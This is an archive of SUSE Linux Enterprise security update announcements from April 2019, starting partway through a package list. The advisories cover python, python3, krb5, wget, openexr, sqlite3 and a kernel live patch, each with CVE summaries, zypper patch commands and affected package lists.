mozilla-nspr-debugsource-4.20-19.6.1 mozilla-nspr-devel-4.20-19.6.1 mozilla-nss-3.40.1-58.18.1 mozilla-nss-32bit-3.40.1-58.18.1 mozilla-nss-certs-3.40.1-58.18.1 mozilla-nss-certs-32bit-3.40.1-58.18.1 mozilla-nss-certs-debuginfo-3.40.1-58.18.1 mozilla-nss-certs-debuginfo-32bit-3.40.1-58.18.1 mozilla-nss-debuginfo-3.40.1-58.18.1 mozilla-nss-debuginfo-32bit-3.40.1-58.18.1 mozilla-nss-debugsource-3.40.1-58.18.1 mozilla-nss-devel-3.40.1-58.18.1 mozilla-nss-sysinit-3.40.1-58.18.1 mozilla-nss-sysinit-32bit-3.40.1-58.18.1 mozilla-nss-sysinit-debuginfo-3.40.1-58.18.1 mozilla-nss-sysinit-debuginfo-32bit-3.40.1-58.18.1 mozilla-nss-tools-3.40.1-58.18.1 mozilla-nss-tools-debuginfo-3.40.1-58.18.1 References: https://www.suse.com/security/cve/CVE-2018-0495.html https://www.suse.com/security/cve/CVE-2018-12384.html https://www.suse.com/security/cve/CVE-2018-12404.html https://www.suse.com/security/cve/CVE-2018-12405.html https://www.suse.com/security/cve/CVE-2018-17466.html https://www.suse.com/security/cve/CVE-2018-18492.html https://www.suse.com/security/cve/CVE-2018-18493.html https://www.suse.com/security/cve/CVE-2018-18494.html https://www.suse.com/security/cve/CVE-2018-18498.html https://bugzilla.suse.com/1097410 https://bugzilla.suse.com/1106873 https://bugzilla.suse.com/1119069 https://bugzilla.suse.com/1119105 From sle-security-updates at lists.suse.com Mon Apr 15 13:09:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Mon, 15 Apr 2019 21:09:54 +0200 (CEST) Subject: SUSE-SU-2019:14018-1: important: Security update for python Message-ID: <20190415190954.0B08EFD1B@maintenance.suse.de> SUSE Security Update: Security update for python ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14018-1 Rating: important References: #1129346 #1130847 Cross-References: CVE-2019-9636 CVE-2019-9948 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Point of Sale 11-SP3 SUSE Linux Enterprise Debuginfo 11-SP4 SUSE Linux Enterprise Debuginfo 11-SP3 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for python fixes the following issues: Security issues fixed: - CVE-2019-9948: Fixed a 'file:' blacklist bypass in URIs by using the 'local-file:' scheme instead (bsc#1130847). - CVE-2019-9636: Fixed an information disclosure because of incorrect handling of Unicode encoding during NFKC normalization (bsc#1129346). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-python-14018=1 - SUSE Linux Enterprise Point of Sale 11-SP3: zypper in -t patch sleposp3-python-14018=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-python-14018=1 - SUSE Linux Enterprise Debuginfo 11-SP3: zypper in -t patch dbgsp3-python-14018=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): libpython2_6-1_0-2.6.9-40.24.1 python-2.6.9-40.24.1 python-base-2.6.9-40.24.1 python-curses-2.6.9-40.24.1 python-demo-2.6.9-40.24.1 python-gdbm-2.6.9-40.24.1 python-idle-2.6.9-40.24.1 python-tk-2.6.9-40.24.1 python-xml-2.6.9-40.24.1 - SUSE Linux Enterprise Server 11-SP4-LTSS (ppc64 s390x x86_64): libpython2_6-1_0-32bit-2.6.9-40.24.1 python-32bit-2.6.9-40.24.1 python-base-32bit-2.6.9-40.24.1 - SUSE Linux Enterprise Server 11-SP4-LTSS (noarch): python-doc-2.6-8.40.24.1 python-doc-pdf-2.6-8.40.24.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (noarch): python-doc-2.6-8.40.24.1 python-doc-pdf-2.6-8.40.24.1 - SUSE Linux Enterprise Point of Sale 11-SP3 (i586): libpython2_6-1_0-2.6.9-40.24.1 python-2.6.9-40.24.1 python-base-2.6.9-40.24.1 python-curses-2.6.9-40.24.1 python-demo-2.6.9-40.24.1 python-gdbm-2.6.9-40.24.1 python-idle-2.6.9-40.24.1 python-tk-2.6.9-40.24.1 python-xml-2.6.9-40.24.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): python-base-debuginfo-2.6.9-40.24.1 python-base-debugsource-2.6.9-40.24.1 python-debuginfo-2.6.9-40.24.1 python-debugsource-2.6.9-40.24.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (ppc64 s390x x86_64): python-base-debuginfo-32bit-2.6.9-40.24.1 python-debuginfo-32bit-2.6.9-40.24.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (i586 s390x x86_64): python-base-debuginfo-2.6.9-40.24.1 python-base-debugsource-2.6.9-40.24.1 python-debuginfo-2.6.9-40.24.1 python-debugsource-2.6.9-40.24.1 - SUSE Linux Enterprise Debuginfo 11-SP3 (s390x x86_64): python-base-debuginfo-32bit-2.6.9-40.24.1 python-debuginfo-32bit-2.6.9-40.24.1 References: https://www.suse.com/security/cve/CVE-2019-9636.html https://www.suse.com/security/cve/CVE-2019-9948.html https://bugzilla.suse.com/1129346 https://bugzilla.suse.com/1130847 From sle-security-updates at lists.suse.com Tue Apr 16 10:09:28 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 16 Apr 2019 18:09:28 +0200 (CEST) Subject: SUSE-SU-2019:0955-1: important: Security update for the Linux Kernel (Live Patch 28 for SLE 12 SP2) Message-ID: <20190416160928.D338A10127@maintenance.suse.de> SUSE Security Update: Security update for the Linux Kernel (Live Patch 28 for SLE 12 SP2) ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0955-1 Rating: important References: #1102682 Cross-References: CVE-2018-5390 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP2-LTSS ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for the Linux Kernel 4.4.121-92_104 fixes one issue. The following security issue was fixed: - CVE-2018-5390: The Linux kernel could be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service (bsc#1102682). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-955=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-955=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): kgraft-patch-4_4_121-92_104-default-2-2.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le x86_64): kgraft-patch-4_4_121-92_104-default-2-2.1 References: https://www.suse.com/security/cve/CVE-2018-5390.html https://bugzilla.suse.com/1102682 From sle-security-updates at lists.suse.com Tue Apr 16 10:10:43 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 16 Apr 2019 18:10:43 +0200 (CEST) Subject: SUSE-SU-2019:0113-2: important: Security update for krb5 Message-ID: <20190416161043.C0AF610124@maintenance.suse.de> SUSE Security Update: Security update for krb5 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0113-2 Rating: important References: #1120489 Cross-References: CVE-2018-20217 Affected Products: SUSE Linux Enterprise Server for SAP 12-SP1 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for krb5 fixes the following issues: Security issue fixed: - CVE-2018-20217: Fixed an assertion issue with older encryption types (bsc#1120489) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-113=1 Package List: - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): krb5-1.12.1-38.13.2 krb5-32bit-1.12.1-38.13.2 krb5-client-1.12.1-38.13.2 krb5-client-debuginfo-1.12.1-38.13.2 krb5-debuginfo-1.12.1-38.13.2 krb5-debuginfo-32bit-1.12.1-38.13.2 krb5-debugsource-1.12.1-38.13.2 krb5-doc-1.12.1-38.13.2 krb5-plugin-kdb-ldap-1.12.1-38.13.2 krb5-plugin-kdb-ldap-debuginfo-1.12.1-38.13.2 krb5-plugin-preauth-otp-1.12.1-38.13.2 krb5-plugin-preauth-otp-debuginfo-1.12.1-38.13.2 krb5-plugin-preauth-pkinit-1.12.1-38.13.2 krb5-plugin-preauth-pkinit-debuginfo-1.12.1-38.13.2 krb5-server-1.12.1-38.13.2 krb5-server-debuginfo-1.12.1-38.13.2 References: https://www.suse.com/security/cve/CVE-2018-20217.html https://bugzilla.suse.com/1120489 From sle-security-updates at lists.suse.com Tue Apr 16 10:11:29 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 16 Apr 2019 18:11:29 +0200 (CEST) Subject: SUSE-SU-2019:0956-1: important: Security update for wget Message-ID: <20190416161129.8660110124@maintenance.suse.de> SUSE Security Update: Security update for wget ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0956-1 Rating: important References: #1131493 Cross-References: CVE-2019-5953 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for wget fixes the following issues: Security issue fixed: - CVE-2019-5953: Fixed a buffer overflow vulnerability which might cause code execution (bsc#1131493). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-956=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-956=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-956=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-956=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-956=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-956=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-956=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-956=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-956=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-956=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-956=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-956=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 - SUSE Enterprise Storage 4 (x86_64): wget-1.14-21.10.1 wget-debuginfo-1.14-21.10.1 wget-debugsource-1.14-21.10.1 References: https://www.suse.com/security/cve/CVE-2019-5953.html https://bugzilla.suse.com/1131493 From sle-security-updates at lists.suse.com Tue Apr 16 13:11:54 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 16 Apr 2019 21:11:54 +0200 (CEST) Subject: SUSE-SU-2019:0961-1: important: Security update for python3 Message-ID: <20190416191154.8B5DEFDF1@maintenance.suse.de> SUSE Security Update: Security update for python3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0961-1 Rating: important References: #1129346 Cross-References: CVE-2019-9636 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Module for Web Scripting 12 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for python3 fixes the following issues: Security issue fixed: - CVE-2019-9636: Fixed an information disclosure because of incorrect handling of Unicode encoding during NFKC normalization (bsc#1129346). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-961=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-961=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-961=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-961=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-961=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-961=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-961=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-961=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-961=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-961=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-961=1 - SUSE Linux Enterprise Module for Web Scripting 12: zypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2019-961=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-961=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-961=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-961=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-dbm-3.4.6-25.24.1 python3-dbm-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 python3-devel-3.4.6-25.24.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (ppc64le s390x x86_64): python3-devel-debuginfo-3.4.6-25.24.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-devel-3.4.6-25.24.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (ppc64le s390x x86_64): python3-devel-debuginfo-3.4.6-25.24.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Module for Web Scripting 12 (aarch64 ppc64le s390x x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 - SUSE Enterprise Storage 4 (x86_64): libpython3_4m1_0-3.4.6-25.24.1 libpython3_4m1_0-debuginfo-3.4.6-25.24.1 python3-3.4.6-25.24.1 python3-base-3.4.6-25.24.1 python3-base-debuginfo-3.4.6-25.24.1 python3-base-debugsource-3.4.6-25.24.1 python3-curses-3.4.6-25.24.1 python3-curses-debuginfo-3.4.6-25.24.1 python3-debuginfo-3.4.6-25.24.1 python3-debugsource-3.4.6-25.24.1 References: https://www.suse.com/security/cve/CVE-2019-9636.html https://bugzilla.suse.com/1129346 From sle-security-updates at lists.suse.com Tue Apr 16 13:12:36 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 16 Apr 2019 21:12:36 +0200 (CEST) Subject: SUSE-SU-2019:0954-1: Security update for openexr Message-ID: <20190416191236.F1A39FDF1@maintenance.suse.de> SUSE Security Update: Security update for openexr ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0954-1 Rating: low References: #1113455 Cross-References: CVE-2018-18444 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for openexr fixes the following issues: Security issue fixed: - CVE-2018-18444: Fixed Out-of-bounds write in makeMultiView.cpp (bsc#1113455). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-954=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-954=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): openexr-2.2.1-3.3.11 openexr-debuginfo-2.2.1-3.3.11 openexr-debugsource-2.2.1-3.3.11 openexr-doc-2.2.1-3.3.11 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): libIlmImf-2_2-23-2.2.1-3.3.11 libIlmImf-2_2-23-debuginfo-2.2.1-3.3.11 libIlmImfUtil-2_2-23-2.2.1-3.3.11 libIlmImfUtil-2_2-23-debuginfo-2.2.1-3.3.11 openexr-debuginfo-2.2.1-3.3.11 openexr-debugsource-2.2.1-3.3.11 openexr-devel-2.2.1-3.3.11 References: https://www.suse.com/security/cve/CVE-2018-18444.html https://bugzilla.suse.com/1113455 From sle-security-updates at lists.suse.com Wed Apr 17 10:10:08 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 17 Apr 2019 18:10:08 +0200 (CEST) Subject: SUSE-SU-2019:0973-1: moderate: Security update for sqlite3 Message-ID: <20190417161008.A3C29FDF1@maintenance.suse.de> SUSE Security Update: Security update for sqlite3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0973-1 Rating: moderate References: #1119687 #1131576 #987394 Cross-References: CVE-2016-6153 CVE-2018-20346 CVE-2018-20506 Affected Products: SUSE Linux Enterprise Server 12-LTSS ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for sqlite3 fixes the following issues: Security issues fixed: - CVE-2018-20506: Fixed an integer overflow when FTS3 extension is enabled (bsc#1131576). - CVE-2018-20346: Fixed a remote code execution vulnerability in FTS3 (Magellan) (bsc#1119687). - CVE-2016-6153: Fixed incorrect permissions when creating temporary files (bsc#987394). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-973=1 Package List: - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): libsqlite3-0-3.8.3.1-2.7.1 libsqlite3-0-debuginfo-3.8.3.1-2.7.1 sqlite3-3.8.3.1-2.7.1 sqlite3-debuginfo-3.8.3.1-2.7.1 sqlite3-debugsource-3.8.3.1-2.7.1 - SUSE Linux Enterprise Server 12-LTSS (s390x x86_64): libsqlite3-0-32bit-3.8.3.1-2.7.1 libsqlite3-0-debuginfo-32bit-3.8.3.1-2.7.1 References: https://www.suse.com/security/cve/CVE-2016-6153.html https://www.suse.com/security/cve/CVE-2018-20346.html https://www.suse.com/security/cve/CVE-2018-20506.html https://bugzilla.suse.com/1119687 https://bugzilla.suse.com/1131576 https://bugzilla.suse.com/987394 From sle-security-updates at lists.suse.com Wed Apr 17 13:09:49 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Wed, 17 Apr 2019 21:09:49 +0200 (CEST) Subject: SUSE-SU-2019:0972-1: important: Security update for python Message-ID: <20190417190949.EE3F1FDF1@maintenance.suse.de> SUSE Security Update: Security update for python ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0972-1 Rating: important References: #1129346 #1130847 Cross-References: CVE-2019-9636 CVE-2019-9948 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for python fixes the following issues: Security issues fixed: - CVE-2019-9948: Fixed a 'file:' blacklist bypass in URIs by using the 'local-file:' scheme instead (bsc#1130847). - CVE-2019-9636: Fixed an information disclosure because of incorrect handling of Unicode encoding during NFKC normalization (bsc#1129346). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-972=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-972=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-972=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): python-debuginfo-2.7.14-7.11.1 python-debugsource-2.7.14-7.11.1 python-demo-2.7.14-7.11.1 python-idle-2.7.14-7.11.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): python-doc-2.7.14-7.11.2 